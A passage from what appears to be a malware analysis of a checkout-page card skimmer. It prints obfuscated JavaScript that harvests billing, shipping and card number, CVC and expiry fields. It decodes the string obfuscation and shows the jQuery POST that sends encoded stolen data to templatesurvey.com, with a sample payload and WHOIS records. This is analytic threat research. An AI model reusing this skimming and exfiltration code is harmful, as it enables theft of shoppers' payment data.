) {
_0x4A00(_0x49DF);
} else {
_0x499D(_0x47AE, "js");
}
}
The skimmer also performs some validation checks when capturing the data from the targeted field data:
function _0x4C10(_0x4D9C) {
_0x49BE("In collectData", 1);
jQuery.each(_0x4D9C.serializeArray(), function () {
if (
(this.name.indexOf("shipping_") !== -1 ||
this.name.indexOf("billing_") !== -1 ||
this.name.indexOf(_0x47CF.wtf()) !== -1) &&
this.value != ""
) {
_0x4C31[this.name] = this.value;
}
});
jQuery.each(
_0x4D9C.find('input[id*="' + _0x47CF.wtf() + '"]:visible'),
function () {
_0x4C31[jQuery(this).attr("id")] = this.value;
}
);
_0x4CB5(_0x4C31, _0x46A6.wtf(), _0x47CF.wtf() + "-card-number");
_0x4CB5(_0x4C31, _0x46C7.wtf(), _0x47CF.wtf() + "-card-cvc");
_0x4CB5(_0x4C31, _0x46E8.wtf(), _0x47CF.wtf() + "-card-expiry");
if (_0x4709 && _0x4C31[_0x4709.wtf()]) {
_0x4C31[_0x47CF.wtf() + "-card-expiry"] =
_0x4C31[_0x47CF.wtf() + "-card-expiry"] +
" / " +
_0x4C31[_0x4709.wtf()];
delete _0x4C31[_0x4709.wtf()];
}
if (_0x472A) {
_0x4CB5(_0x4C31, _0x472A.wtf(), _0x47CF.wtf() + "_cc_owner");
}
}
Obfuscation⌗
-
Values assigned to an array within the main variable
_0x495B
-
Hex encoded string values within the array:
\x77\x74\x66
->wtf
-
An additional layer of hex encoding and also some obfuscation that adds an additional character
$
for the most sensitive strings:
\x32\x66\x24\x36\x33\x24\x36\x38\x24\x36\x35\x24\x36\x33\x24\x36\x62\x24\x36\x66\x24\x37\x35\x24\x37\x34
⬇️⬇️
2f$63$68$65$63$6b$6f$75$74
⬇️⬇️
2f 63 68 65 63 6b 6f 75 74
⬇️⬇️
/checkout
Exfiltration: templatesurvey.com
⌗
Upon a victim submitting their payment data (in a POST request), the skimmer then encodes the skimmed data using base64
, rot13
, rot5
before it is exfiltrated via a separate POST request to the malicious URL templatesurvey.com/analyze
:
jQuery
.ajax({
type: "POST",
url: _0x4874.wtf(),
data: _0x4BEF(JSON.stringify(_0x4C31).rot13().rot5()),
timeout: 20000,
contentType: "text/plain",
})
ROT5 is similar to ROT13 except that it applies to numeric digits (0 to 9). ROT13 and ROT5 can be used together in the same message, sometimes called ROT18 (18 = 13 + 5) or ROT13.5.
Here’s a sample of the encoded data sent in the exfiltration POST request to templatesurvey.com
:
eyJoZXkiOiJ5YnBueXViZmciLCJnbGNyIjoiamNfamJiIiwienJlIjoiY25sY255Y2ViIiwib3Z5eXZhdF9zdmVmZ19hbnpyIjoiV2J1YSIsIm92eXl2YXRfeW5mZ19hbnpyIjoiUWJyIiwib3Z5eXZhdF9wYmhhZ2VsIjoiSEYiLCJvdnl5dmF0X25xcWVyZmZfNiI6IjYxNTUgQ3JhYWYiLCJvdnl5dmF0X3B2Z2wiOiJOaGViZW4iLCJvdnl5dmF0X2ZnbmdyIjoiUEIiLCJvdnl5dmF0X2NiZmdwYnFyIjoiMzUwNTUiLCJvdnl5dmF0X2N1YmFyIjoiNzM2ODg1MzU1OSIsIm92eXl2YXRfcnpudnkiOiJwaGVhN0B5cnEucGJ6Iiwib3Z5eXZhdF9wbmVxZ2xjciI6Ikl2Zm4iLCJjbmxjbnljZWItcG5lcS1haHpvcmUiOiI5NTY3MzMzMzMzMzM2MzM2IiwiY25sY255Y2ViLXBuZXEtcGlwIjoiNjc4IiwiY25sY255Y2ViLXBuZXEtcmtjdmVsIjoiOCAvIDc1NzkifQ==
Decode: base64 -> rot13 -> rot5 -> plaintext
Domain Name: TEMPLATESURVEY.COM
Registry Domain ID: 2569768401_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.internet.bs
Registrar URL: http://www.internet.bs
Updated Date: 2020-11-02T12:49:21Z
Creation Date: 2020-11-02T12:49:20Z
Registry Expiry Date: 2021-11-02T12:49:20Z